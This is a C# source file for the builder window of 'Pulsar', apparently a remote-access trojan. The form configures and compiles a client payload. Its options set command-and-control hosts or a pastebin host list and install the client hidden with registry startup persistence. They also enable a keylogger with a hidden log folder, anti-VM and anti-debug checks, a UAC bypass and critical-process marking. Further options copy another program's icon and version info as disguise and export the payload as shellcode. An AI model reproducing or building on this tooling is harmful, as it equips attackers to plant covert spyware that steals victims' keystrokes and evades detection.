Files
i2p 773d05f8f1
Pulsar .NET 9.0 Windows Release / build (push) Waiting to run
Mirror to Codeberg and Gitea / mirror (push) Waiting to run
initial commit
2026-08-27 10:57:58 -06:00

1075 lines
39 KiB
C#

using Pulsar.Common.DNS;
using Pulsar.Common.Helpers;
using Pulsar.Server.Build;
using Pulsar.Server.Forms.DarkMode;
using Pulsar.Server.Models;
using Pulsar.Server.Utilities;
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Linq;
using System.Text.RegularExpressions;
using System.Threading;
using System.Windows.Forms;
namespace Pulsar.Server.Forms
{
public partial class FrmBuilder : Form
{
private bool _profileLoaded;
private bool _changed;
private readonly BindingList<Host> _hosts = new BindingList<Host>();
private readonly HostsConverter _hostsConverter = new HostsConverter();
private Label lblPortNotification;
private System.Windows.Forms.Timer portNotificationTimer;
private System.Windows.Forms.Timer portSetDelayTimer;
private string pendingHostText;
public FrmBuilder()
{
InitializeComponent();
DarkModeManager.ApplyDarkMode(this);
ScreenCaptureHider.ScreenCaptureHider.Apply(this.Handle);
txtHost.TextChanged += txtHost_TextChanged;
txtHost.KeyDown += TxtHost_KeyDown;
txtIconPath.TextChanged += TxtIconPath_TextChanged;
lblPortNotification = new Label();
lblPortNotification.AutoSize = true;
lblPortNotification.ForeColor = Color.Lime;
lblPortNotification.Text = "Automatically set port!";
lblPortNotification.Visible = false;
lblPortNotification.Location = new Point(btnAddHost.Location.X + 145, btnAddHost.Location.Y + btnAddHost.Height + 5);
this.Controls.Add(lblPortNotification);
portNotificationTimer = new System.Windows.Forms.Timer();
portNotificationTimer.Interval = 3000;
portNotificationTimer.Tick += (s, e) => {
lblPortNotification.Visible = false;
portNotificationTimer.Stop();
};
portSetDelayTimer = new System.Windows.Forms.Timer();
portSetDelayTimer.Interval = 1000;
portSetDelayTimer.Tick += PortSetDelayTimer_Tick;
checkBox1.CheckedChanged += CheckBox1_CheckedChanged;
chkCryptable.CheckedChanged += ChkCryptable_CheckedChanged;
}
private void CheckBox1_CheckedChanged(object sender, EventArgs e)
{
HasChanged();
UpdatePastebinUI();
}
private void ChkCryptable_CheckedChanged(object sender, EventArgs e)
{
bool cryptable = chkCryptable.Checked;
txtTag.Enabled = true;
txtMutex.Enabled = true;
connectionPage.Enabled = true;
monitoringTab.Enabled = true;
chkKeylogger.Enabled = true;
installationPage.Enabled = !cryptable;
chkInstall.Enabled = !cryptable;
txtInstallName.Enabled = !cryptable;
rbAppdata.Enabled = !cryptable;
rbProgramFiles.Enabled = !cryptable;
rbSystem.Enabled = !cryptable;
txtInstallSubDirectory.Enabled = !cryptable;
chkHide.Enabled = !cryptable;
chkHideSubDirectory.Enabled = !cryptable;
chkStartup.Enabled = !cryptable;
txtRegistryKeyName.Enabled = !cryptable;
assemblyPage.Enabled = !cryptable;
chkChangeIcon.Enabled = !cryptable;
txtIconPath.Enabled = !cryptable;
btnBrowseIcon.Enabled = !cryptable;
chkChangeAsmInfo.Enabled = !cryptable;
txtProductName.Enabled = !cryptable;
txtDescription.Enabled = !cryptable;
txtCompanyName.Enabled = !cryptable;
txtCopyright.Enabled = !cryptable;
txtTrademarks.Enabled = !cryptable;
txtOriginalFilename.Enabled = !cryptable;
txtProductVersion.Enabled = !cryptable;
txtFileVersion.Enabled = !cryptable;
chkCriticalProcess.Enabled = !cryptable;
chkUACBypass.Enabled = !cryptable;
chkAntiDebug.Enabled = !cryptable;
chkVM.Enabled = !cryptable;
txtLogDirectoryName.Enabled = chkKeylogger.Checked && monitoringTab.Enabled;
chkHideLogDirectory.Enabled = chkKeylogger.Checked && monitoringTab.Enabled;
if (cryptable)
{
chkInstall.Checked = false;
txtInstallName.Text = string.Empty;
rbAppdata.Checked = true;
txtInstallSubDirectory.Text = string.Empty;
chkHide.Checked = false;
chkHideSubDirectory.Checked = false;
chkStartup.Checked = false;
txtRegistryKeyName.Text = string.Empty;
chkChangeIcon.Checked = false;
txtIconPath.Text = string.Empty;
chkChangeAsmInfo.Checked = false;
txtProductName.Text = string.Empty;
txtDescription.Text = string.Empty;
txtCompanyName.Text = string.Empty;
txtCopyright.Text = string.Empty;
txtTrademarks.Text = string.Empty;
txtOriginalFilename.Text = string.Empty;
txtProductVersion.Text = string.Empty;
txtFileVersion.Text = string.Empty;
chkCriticalProcess.Checked = false;
chkUACBypass.Checked = false;
chkAntiDebug.Checked = false;
chkVM.Checked = false;
if (!chkKeylogger.Checked)
{
txtLogDirectoryName.Text = string.Empty;
chkHideLogDirectory.Checked = false;
}
}
}
private void UpdatePastebinUI()
{
txtHost.Enabled = !checkBox1.Checked;
numericUpDownPort.Enabled = !checkBox1.Checked;
btnAddHost.Enabled = !checkBox1.Checked;
lstHosts.Enabled = !checkBox1.Checked;
txtPastebin.Enabled = checkBox1.Checked;
}
private bool IsValidHostPortFormat(string text)
{
string[] protocolPrefixes = { "http://", "https://", "ftp://", "sftp://" };
if (protocolPrefixes.Any(p => text.Trim().StartsWith(p, StringComparison.OrdinalIgnoreCase)))
{
return false;
}
string[] parts = text.Split(':');
return parts.Length == 2 &&
!string.IsNullOrWhiteSpace(parts[0]) &&
ushort.TryParse(parts[1].Trim(), out _);
}
private void PortSetDelayTimer_Tick(object sender, EventArgs e)
{
portSetDelayTimer.Stop();
if (pendingHostText != null && IsValidHostPortFormat(pendingHostText))
{
string[] parts = pendingHostText.Split(':');
if (parts.Length == 2)
{
string portStr = parts[1].Trim();
txtHost.TextChanged -= txtHost_TextChanged;
txtHost.Text = parts[0];
if (ushort.TryParse(portStr, out ushort port))
{
try
{
numericUpDownPort.Value = port;
lblPortNotification.Visible = true;
if (portNotificationTimer.Enabled)
{
portNotificationTimer.Stop();
}
portNotificationTimer.Start();
}
catch (ArgumentOutOfRangeException)
{
// Silently handle out of range port
}
}
txtHost.TextChanged += txtHost_TextChanged;
}
}
pendingHostText = null;
}
private void txtHost_TextChanged(object sender, EventArgs e)
{
string text = txtHost.Text;
if (text.Contains(":"))
{
pendingHostText = text;
if (portSetDelayTimer.Enabled)
{
portSetDelayTimer.Stop();
}
portSetDelayTimer.Start();
}
}
private void TxtHost_KeyDown(object sender, KeyEventArgs e)
{
if (e.Control && e.KeyCode == Keys.V)
{
if (portSetDelayTimer.Enabled)
{
portSetDelayTimer.Stop();
}
string clipboardText = Clipboard.GetText();
if (clipboardText.Contains(":"))
{
// Check if the clipboard text is a valid host:port format
if (IsValidHostPortFormat(clipboardText))
{
e.SuppressKeyPress = true;
e.Handled = true;
string[] parts = clipboardText.Split(':');
if (ushort.TryParse(parts[1], out ushort port))
{
txtHost.Text = parts[0];
numericUpDownPort.Value = port;
lblPortNotification.Visible = true;
if (portNotificationTimer.Enabled)
{
portNotificationTimer.Stop();
}
portNotificationTimer.Start();
}
}
}
}
}
private void LoadProfile(string profileName)
{
var profile = new BuilderProfile(profileName);
_hosts.Clear();
foreach (var host in _hostsConverter.RawHostsToList(profile.Hosts, true))
_hosts.Add(host);
txtTag.Text = profile.Tag;
numericUpDownDelay.Value = profile.Delay;
txtMutex.Text = profile.Mutex;
chkInstall.Checked = profile.InstallClient;
txtInstallName.Text = profile.InstallName;
GetInstallPath(profile.InstallPath).Checked = true;
txtInstallSubDirectory.Text = profile.InstallSub;
chkHide.Checked = profile.HideFile;
chkHideSubDirectory.Checked = profile.HideSubDirectory;
chkStartup.Checked = profile.AddStartup;
txtRegistryKeyName.Text = profile.RegistryName;
chkChangeIcon.Checked = profile.ChangeIcon;
txtIconPath.Text = profile.IconPath;
LoadIconPreview(profile.IconPath);
chkChangeAsmInfo.Checked = profile.ChangeAsmInfo;
chkKeylogger.Checked = profile.Keylogger;
txtLogDirectoryName.Text = profile.LogDirectoryName;
chkHideLogDirectory.Checked = profile.HideLogDirectory;
txtProductName.Text = profile.ProductName;
txtDescription.Text = profile.Description;
txtCompanyName.Text = profile.CompanyName;
txtCopyright.Text = profile.Copyright;
txtTrademarks.Text = profile.Trademarks;
txtOriginalFilename.Text = profile.OriginalFilename;
txtProductVersion.Text = profile.ProductVersion;
txtFileVersion.Text = profile.FileVersion;
txtPastebin.Text = profile.Pastebin;
checkBox1.Checked = profile.EnablePastebin;
chkVM.Checked = profile.EnableAntiVM;
chkAntiDebug.Checked = profile.EnableAntiDebug;
chkCriticalProcess.Checked = profile.EnableCriticalProcess;
chkUACBypass.Checked = profile.EnableUACBypass;
_profileLoaded = true;
}
private void SaveProfile(string profileName)
{
var profile = new BuilderProfile(profileName);
profile.Tag = txtTag.Text;
profile.Hosts = _hostsConverter.ListToRawHosts(_hosts);
profile.Delay = (int)numericUpDownDelay.Value;
profile.Mutex = txtMutex.Text;
profile.Pastebin = txtPastebin.Text;
profile.EnablePastebin = checkBox1.Checked;
profile.InstallClient = chkInstall.Checked;
profile.InstallName = txtInstallName.Text;
profile.InstallPath = GetInstallPath();
profile.InstallSub = txtInstallSubDirectory.Text;
profile.HideFile = chkHide.Checked;
profile.HideSubDirectory = chkHideSubDirectory.Checked;
profile.AddStartup = chkStartup.Checked;
profile.RegistryName = txtRegistryKeyName.Text;
profile.ChangeIcon = chkChangeIcon.Checked;
profile.IconPath = txtIconPath.Text;
profile.ChangeAsmInfo = chkChangeAsmInfo.Checked;
profile.Keylogger = chkKeylogger.Checked;
profile.LogDirectoryName = txtLogDirectoryName.Text;
profile.HideLogDirectory = chkHideLogDirectory.Checked;
profile.ProductName = txtProductName.Text;
profile.Description = txtDescription.Text;
profile.CompanyName = txtCompanyName.Text;
profile.Copyright = txtCopyright.Text;
profile.Trademarks = txtTrademarks.Text;
profile.OriginalFilename = txtOriginalFilename.Text;
profile.ProductVersion = txtProductVersion.Text;
profile.FileVersion = txtFileVersion.Text;
profile.EnableAntiVM = chkVM.Checked;
profile.EnableAntiDebug = chkAntiDebug.Checked;
profile.EnableCriticalProcess = chkCriticalProcess.Checked;
profile.EnableUACBypass = chkUACBypass.Checked;
}
private void FrmBuilder_Load(object sender, EventArgs e)
{
lstHosts.DataSource = new BindingSource(_hosts, null);
LoadProfile("Default");
numericUpDownPort.Value = Settings.ListenPort;
lblPortNotification.BringToFront();
UpdateInstallationControlStates();
UpdateStartupControlStates();
UpdateAssemblyControlStates();
UpdateIconControlStates();
UpdateKeyloggerControlStates();
UpdatePastebinUI();
btnShellcode.Enabled = File.Exists(Path.Combine(Environment.CurrentDirectory, "donut.exe"));
groupBox1.Visible = File.Exists(Path.Combine(Environment.CurrentDirectory, "donut.exe"));
comboBox1.SelectedIndex = 0;
}
private void FrmBuilder_FormClosing(object sender, FormClosingEventArgs e)
{
if (_changed &&
MessageBox.Show(this, "Do you want to save your current settings?", "Changes detected",
MessageBoxButtons.YesNo, MessageBoxIcon.Question) == DialogResult.Yes)
{
SaveProfile("Default");
}
}
private void btnAddHost_Click(object sender, EventArgs e)
{
if (txtHost.Text.Length < 1) return;
HasChanged();
var host = txtHost.Text;
ushort port = (ushort)numericUpDownPort.Value;
_hosts.Add(new Host { Hostname = host, Port = port });
txtHost.Text = "";
}
#region "Context Menu"
private void removeHostToolStripMenuItem_Click(object sender, EventArgs e)
{
HasChanged();
List<string> selectedHosts = (from object arr in lstHosts.SelectedItems select arr.ToString()).ToList();
foreach (var item in selectedHosts)
{
foreach (var host in _hosts)
{
if (item == host.ToString())
{
_hosts.Remove(host);
break;
}
}
}
}
private void clearToolStripMenuItem_Click(object sender, EventArgs e)
{
HasChanged();
_hosts.Clear();
}
#endregion
#region "Misc"
private void txtInstallname_KeyPress(object sender, KeyPressEventArgs e)
{
e.Handled = ((e.KeyChar == '\\' || FileHelper.HasIllegalCharacters(e.KeyChar.ToString())) &&
!char.IsControl(e.KeyChar));
}
private void txtInstallsub_KeyPress(object sender, KeyPressEventArgs e)
{
e.Handled = ((e.KeyChar == '\\' || FileHelper.HasIllegalCharacters(e.KeyChar.ToString())) &&
!char.IsControl(e.KeyChar));
}
private void txtLogDirectoryName_KeyPress(object sender, KeyPressEventArgs e)
{
e.Handled = ((e.KeyChar == '\\' || FileHelper.HasIllegalCharacters(e.KeyChar.ToString())) &&
!char.IsControl(e.KeyChar));
}
private void btnMutex_Click(object sender, EventArgs e)
{
HasChanged();
txtMutex.Text = Guid.NewGuid().ToString();
}
private void chkInstall_CheckedChanged(object sender, EventArgs e)
{
HasChanged();
UpdateInstallationControlStates();
}
private void chkStartup_CheckedChanged(object sender, EventArgs e)
{
HasChanged();
UpdateStartupControlStates();
}
private void chkChangeAsmInfo_CheckedChanged(object sender, EventArgs e)
{
HasChanged();
UpdateAssemblyControlStates();
}
private void chkKeylogger_CheckedChanged(object sender, EventArgs e)
{
HasChanged();
UpdateKeyloggerControlStates();
}
private void chkAntiDebug_CheckedChanged(object sender, EventArgs e)
{
HasChanged();
}
private void chkVM_CheckedChanged(object sender, EventArgs e)
{
HasChanged();
}
private void chkUACBypass_CheckedChanged(object sender, EventArgs e)
{
HasChanged();
}
private void chkCriticalProcess_CheckedChanged(object sender, EventArgs e)
{
HasChanged();
}
private void btnBrowseIcon_Click(object sender, EventArgs e)
{
using (OpenFileDialog ofd = new OpenFileDialog())
{
ofd.Title = "Choose Icon";
ofd.Filter = "Icons *.ico|*.ico";
ofd.Multiselect = false;
if (ofd.ShowDialog() == DialogResult.OK)
{
txtIconPath.Text = ofd.FileName;
LoadIconPreview(ofd.FileName);
}
}
}
private void chkChangeIcon_CheckedChanged(object sender, EventArgs e)
{
HasChanged();
UpdateIconControlStates();
}
#endregion
private bool CheckForEmptyInput()
{
return (!string.IsNullOrWhiteSpace(txtTag.Text) && !string.IsNullOrWhiteSpace(txtMutex.Text) && // General Settings
_hosts.Count > 0 && // Connection
(!chkInstall.Checked || (chkInstall.Checked && !string.IsNullOrWhiteSpace(txtInstallName.Text))) && // Installation
(!chkStartup.Checked || (chkStartup.Checked && !string.IsNullOrWhiteSpace(txtRegistryKeyName.Text)))); // Installation
}
private BuildOptions GetBuildOptions(bool isShellcode = false)
{
BuildOptions options = new BuildOptions();
if (!CheckForEmptyInput() && !checkBox1.Checked)
{
throw new Exception("Please fill out all required fields!");
}
options.Tag = txtTag.Text;
options.Mutex = txtMutex.Text;
if (checkBox1.Checked)
{
options.RawHosts = txtPastebin.Text;
options.Pastebin = true;
// Validate the pastebin URL
if (string.IsNullOrWhiteSpace(options.RawHosts) ||
(!options.RawHosts.StartsWith("http://") && !options.RawHosts.StartsWith("https://")))
{
throw new Exception("Please enter a valid URL for the pastebin. It should start with http:// or https://");
}
}
else
{
options.Pastebin = false;
options.RawHosts = _hostsConverter.ListToRawHosts(_hosts);
if (options.RawHosts.Length < 2)
{
throw new Exception("Please enter a valid host to connect to.");
}
}
options.Delay = (int)numericUpDownDelay.Value;
options.IconPath = txtIconPath.Text;
options.Version = ServerVersion.Current;
options.InstallPath = GetInstallPath();
options.InstallSub = txtInstallSubDirectory.Text;
options.InstallName = txtInstallName.Text + ".exe";
options.StartupName = txtRegistryKeyName.Text;
options.Install = chkInstall.Checked;
options.Startup = chkStartup.Checked;
options.HideFile = chkHide.Checked;
options.HideInstallSubdirectory = chkHideSubDirectory.Checked;
options.Keylogger = chkKeylogger.Checked;
options.LogDirectoryName = txtLogDirectoryName.Text;
options.HideLogDirectory = chkHideLogDirectory.Checked;
options.AntiVM = chkVM.Checked;
options.AntiDebug = chkAntiDebug.Checked;
options.UACBypass = chkUACBypass.Checked;
options.CRITICALPROCESS = chkCriticalProcess.Checked;
if (!File.Exists("client.bin"))
{
throw new Exception("Could not locate \"client.bin\" file. It should be in the same directory as Pulsar.");
}
if (chkChangeIcon.Checked)
{
if (string.IsNullOrWhiteSpace(options.IconPath) || !File.Exists(options.IconPath))
{
throw new Exception("Please choose a valid icon path.");
}
}
else
options.IconPath = string.Empty;
if (chkChangeAsmInfo.Checked)
{
if (!IsValidVersionNumber(txtProductVersion.Text))
{
throw new Exception("Please enter a valid product version number!\nExample: 1.2.3.4");
}
if (!IsValidVersionNumber(txtFileVersion.Text))
{
throw new Exception("Please enter a valid file version number!\nExample: 1.2.3.4");
}
options.AssemblyInformation = new string[8];
options.AssemblyInformation[0] = txtProductName.Text;
options.AssemblyInformation[1] = txtDescription.Text;
options.AssemblyInformation[2] = txtCompanyName.Text;
options.AssemblyInformation[3] = txtCopyright.Text;
options.AssemblyInformation[4] = txtTrademarks.Text;
options.AssemblyInformation[5] = txtOriginalFilename.Text;
options.AssemblyInformation[6] = txtProductVersion.Text;
options.AssemblyInformation[7] = txtFileVersion.Text;
}
using (SaveFileDialog sfd = new SaveFileDialog())
{
sfd.Title = "Save Client as";
sfd.Filter = isShellcode ? "Shellcode Binary *.bin|*.bin" : "Executables *.exe|*.exe";
sfd.RestoreDirectory = true;
sfd.FileName = isShellcode ? "Pulsar-Client.bin" : "Pulsar-Client.exe";
if (sfd.ShowDialog() != DialogResult.OK)
{
throw new Exception("Please choose a valid output path.");
}
options.OutputPath = sfd.FileName;
}
if (string.IsNullOrEmpty(options.OutputPath))
{
throw new Exception("Please choose a valid output path.");
}
return options;
}
private void btnBuild_Click(object sender, EventArgs e)
{
BuildOptions options;
try
{
options = GetBuildOptions();
}
catch (Exception ex)
{
MessageBox.Show(this, ex.Message, "Build failed", MessageBoxButtons.OK, MessageBoxIcon.Error);
return;
}
SetBuildState(false);
Thread t = new Thread(BuildClient);
t.Start(options);
}
private void btnShellcode_Click(object sender, EventArgs e)
{
BuildOptions options;
try
{
options = GetBuildOptions(true);
}
catch (Exception ex)
{
MessageBox.Show(this, ex.Message, "Build failed", MessageBoxButtons.OK, MessageBoxIcon.Error);
return;
}
SetBuildState(false);
Thread t = new Thread(BuildShellcode);
t.Start(options);
}
private void SetBuildState(bool state)
{
try
{
this.Invoke((MethodInvoker)delegate
{
btnBuild.Text = (state) ? "Build" : "Building...";
btnBuild.Enabled = state;
});
}
catch (InvalidOperationException)
{
}
}
private void BuildClient(object o)
{
try
{
BuildOptions options = (BuildOptions)o;
var builder = new ClientBuilder(options, "client.bin");
var code = builder.Build(false, false);
if (!(code))
{
try
{
this.Invoke((MethodInvoker)delegate
{
MessageBox.Show(this,
$"Successfully built client! Saved to:\\{options.OutputPath}",
"Build Success", MessageBoxButtons.OK, MessageBoxIcon.Information);
});
}
catch (Exception)
{
}
}
}
catch (Exception ex)
{
try
{
this.Invoke((MethodInvoker)delegate
{
MessageBox.Show(this,
$"An error occurred!\n\nError Message: {ex.Message}\nStack Trace:\n{ex.StackTrace}", "Build failed",
MessageBoxButtons.OK, MessageBoxIcon.Error);
});
}
catch (Exception)
{
}
}
SetBuildState(true);
}
private void BuildShellcode(object o)
{
try
{
BuildOptions options = (BuildOptions)o;
var builder = new ClientBuilder(options, "client.bin");
builder.BuildShellcode(false, false);
try
{
this.Invoke((MethodInvoker)delegate
{
MessageBox.Show(this,
$"Successfully built client shellcode! Saved to:\\{options.OutputPath}",
"Build Success", MessageBoxButtons.OK, MessageBoxIcon.Information);
});
}
catch (Exception)
{
}
}
catch (Exception ex)
{
try
{
this.Invoke((MethodInvoker)delegate
{
MessageBox.Show(this,
$"An error occured!\n\nError Message: {ex.Message}\nStack Trace:\n{ex.StackTrace}", "Build failed",
MessageBoxButtons.OK, MessageBoxIcon.Error);
});
}
catch (Exception)
{
}
}
SetBuildState(true);
}
private void RefreshPreviewPath()
{
string path = string.Empty;
if (rbAppdata.Checked)
path =
Path.Combine(
Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
txtInstallSubDirectory.Text), txtInstallName.Text);
else if (rbProgramFiles.Checked)
path =
Path.Combine(
Path.Combine(
Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles), txtInstallSubDirectory.Text), txtInstallName.Text);
else if (rbSystem.Checked)
path =
Path.Combine(
Path.Combine(
Environment.GetFolderPath(Environment.SpecialFolder.System), txtInstallSubDirectory.Text), txtInstallName.Text);
this.Invoke((MethodInvoker)delegate { txtPreviewPath.Text = path + ".exe"; });
}
private bool IsValidVersionNumber(string input)
{
Match match = Regex.Match(input, @"^[0-9]+\.[0-9]+(\.[0-9]+)?(\.[0-9]+)?$", RegexOptions.IgnoreCase);
return match.Success;
}
private short GetInstallPath()
{
if (rbAppdata.Checked) return 1;
if (rbProgramFiles.Checked) return 2;
if (rbSystem.Checked) return 3;
throw new ArgumentException("InstallPath");
}
private RadioButton GetInstallPath(short installPath)
{
switch (installPath)
{
case 1:
return rbAppdata;
case 2:
return rbProgramFiles;
case 3:
return rbSystem;
default:
throw new ArgumentException("InstallPath");
}
}
private void UpdateAssemblyControlStates()
{
txtProductName.Enabled = chkChangeAsmInfo.Checked;
txtDescription.Enabled = chkChangeAsmInfo.Checked;
txtCompanyName.Enabled = chkChangeAsmInfo.Checked;
txtCopyright.Enabled = chkChangeAsmInfo.Checked;
txtTrademarks.Enabled = chkChangeAsmInfo.Checked;
txtOriginalFilename.Enabled = chkChangeAsmInfo.Checked;
txtFileVersion.Enabled = chkChangeAsmInfo.Checked;
txtProductVersion.Enabled = chkChangeAsmInfo.Checked;
} private void UpdateIconControlStates()
{
txtIconPath.Enabled = chkChangeIcon.Checked;
btnBrowseIcon.Enabled = chkChangeIcon.Checked;
// Clear icon preview when disabled
if (!chkChangeIcon.Checked)
{
iconPreview.Image?.Dispose();
iconPreview.Image = null;
}
else
{
// Load preview if path exists when enabled
LoadIconPreview(txtIconPath.Text);
}
}
private void UpdateStartupControlStates()
{
txtRegistryKeyName.Enabled = chkStartup.Checked;
}
private void UpdateInstallationControlStates()
{
txtInstallName.Enabled = chkInstall.Checked;
rbAppdata.Enabled = chkInstall.Checked;
rbProgramFiles.Enabled = chkInstall.Checked;
rbSystem.Enabled = chkInstall.Checked;
txtInstallSubDirectory.Enabled = chkInstall.Checked;
chkHide.Enabled = chkInstall.Checked;
chkHideSubDirectory.Enabled = chkInstall.Checked;
}
private void UpdateKeyloggerControlStates()
{
txtLogDirectoryName.Enabled = chkKeylogger.Checked;
chkHideLogDirectory.Enabled = chkKeylogger.Checked;
}
private void HasChanged()
{
if (!_changed && _profileLoaded)
_changed = true;
}
/// <summary>
/// Handles a basic change in setting.
/// </summary>
private void HasChangedSetting(object sender, EventArgs e)
{
HasChanged();
}
/// <summary>
/// Handles a basic change in setting, also refreshing the example file path.
/// </summary>
private void HasChangedSettingAndFilePath(object sender, EventArgs e)
{
HasChanged();
RefreshPreviewPath();
}
private void txtHost_TextChanged_1(object sender, EventArgs e)
{
}
private void builderTabs_SelectedIndexChanged(object sender, EventArgs e)
{
}
private void connectionPage_Click(object sender, EventArgs e)
{
}
private void txtPastebin_TextChanged(object sender, EventArgs e)
{
}
private void btnClone_Click(object sender, EventArgs e)
{
using (OpenFileDialog ofd = new OpenFileDialog())
{
ofd.Title = "Select executable to clone settings from";
ofd.Filter = "Executable files (*.exe)|*.exe";
ofd.Multiselect = false;
if (ofd.ShowDialog() == DialogResult.OK)
{
try
{
FileVersionInfo versionInfo = FileVersionInfo.GetVersionInfo(ofd.FileName);
txtProductName.Text = versionInfo.ProductName ?? "";
txtDescription.Text = versionInfo.FileDescription ?? "";
txtCompanyName.Text = versionInfo.CompanyName ?? "";
txtCopyright.Text = versionInfo.LegalCopyright ?? "";
txtTrademarks.Text = versionInfo.LegalTrademarks ?? "";
txtOriginalFilename.Text = versionInfo.OriginalFilename ?? "";
string productVer = versionInfo.ProductVersion ?? "1.0.0.0";
string fileVer = versionInfo.FileVersion ?? "1.0.0.0";
txtProductVersion.Text = CleanVersionNumber(productVer);
txtFileVersion.Text = CleanVersionNumber(fileVer);
chkChangeAsmInfo.Checked = true;
try
{
string tempIconPath = Path.Combine(Path.GetTempPath(), $"{Path.GetFileNameWithoutExtension(ofd.FileName)}_{Guid.NewGuid()}.ico");
Icon iconextracted = Icon.ExtractAssociatedIcon(ofd.FileName);
Bitmap bitmap = iconextracted.ToBitmap();
SaveBitmapAsIcon(bitmap, tempIconPath);
txtIconPath.Text = tempIconPath;
LoadIconPreview(tempIconPath);
}
catch (Exception ex)
{
MessageBox.Show($"Could not extract icon: {ex.Message}", "Icon Extraction Error",
MessageBoxButtons.OK, MessageBoxIcon.Warning);
}
MessageBox.Show($"Successfully cloned settings from {Path.GetFileName(ofd.FileName)}",
"Clone Complete", MessageBoxButtons.OK, MessageBoxIcon.Information);
HasChanged();
}
catch (Exception ex)
{
MessageBox.Show($"Error cloning settings: {ex.Message}", "Clone Failed",
MessageBoxButtons.OK, MessageBoxIcon.Error);
}
}
}
}
private string CleanVersionNumber(string version)
{
string cleaned = string.Join(".", version.Split('.', ' ')
.Where(s => !string.IsNullOrWhiteSpace(s) && s.Any(char.IsDigit))
.Select(s => string.Join("", s.Where(char.IsDigit))));
string[] parts = cleaned.Split('.');
if (parts.Length == 0)
return "1.0";
else if (parts.Length == 1)
return parts[0] + ".0";
return cleaned;
}
// THIS IS MADE BY CHATGPT BECAUSE WHY TF DOES .NET NOT HAVE ICONS KEEP THEIR TRANSPARENCY WHEN SAVING THEM AS .ICO FILES?!
// YOU NEED TO CONVERT IT TO A BITMAP TO PRESERVE THE ALPHA CHANNEL THEN CONVERT THAT BMP BACK TO AN ICO :sob:
public static void SaveBitmapAsIcon(Bitmap bitmap, string filename)
{
using (var fs = new FileStream(filename, FileMode.Create))
{
// Write ICONDIR structure
fs.Write(new byte[] {
0, 0, // Reserved
1, 0, // Type: 1 = icon
1, 0 // Count: 1 image
}, 0, 6);
// ICONDIR structure: width, height, colors, reserved, planes, bitcount, size, offset
byte width = (byte)(bitmap.Width >= 256 ? 0 : bitmap.Width); // 0 means 256
byte height = (byte)(bitmap.Height >= 256 ? 0 : bitmap.Height); // 0 means 256
using (var imageStream = new MemoryStream())
{
// Save bitmap as PNG inside the .ico (modern format with alpha)
bitmap.Save(imageStream, System.Drawing.Imaging.ImageFormat.Png);
byte[] pngData = imageStream.ToArray();
fs.Write(new byte[] {
width,
height,
0, // Color count
0, // Reserved
1, 0, // Color planes
32, 0 // Bits per pixel
}, 0, 8);
fs.Write(BitConverter.GetBytes(pngData.Length), 0, 4); // Size of image data
fs.Write(BitConverter.GetBytes(22), 0, 4); // Offset of image data
fs.Write(pngData, 0, pngData.Length); // Write PNG data
}
}
}
/// <summary>
/// Loads and displays an icon preview with proper transparency handling
/// </summary>
/// <param name="iconPath">Path to the icon file</param>
private void LoadIconPreview(string iconPath)
{
try
{
if (string.IsNullOrWhiteSpace(iconPath) || !File.Exists(iconPath))
{
iconPreview.Image?.Dispose();
iconPreview.Image = null;
return;
}
iconPreview.Image?.Dispose();
using (Icon icon = new Icon(iconPath, new Size(64, 64)))
{
iconPreview.Image = icon.ToBitmap();
}
}
catch (Exception ex)
{
iconPreview.Image?.Dispose();
iconPreview.Image = null;
Debug.WriteLine($"Error loading icon preview: {ex.Message}");
}
}
private void TxtIconPath_TextChanged(object sender, EventArgs e)
{
LoadIconPreview(txtIconPath.Text);
HasChanged();
}
}
}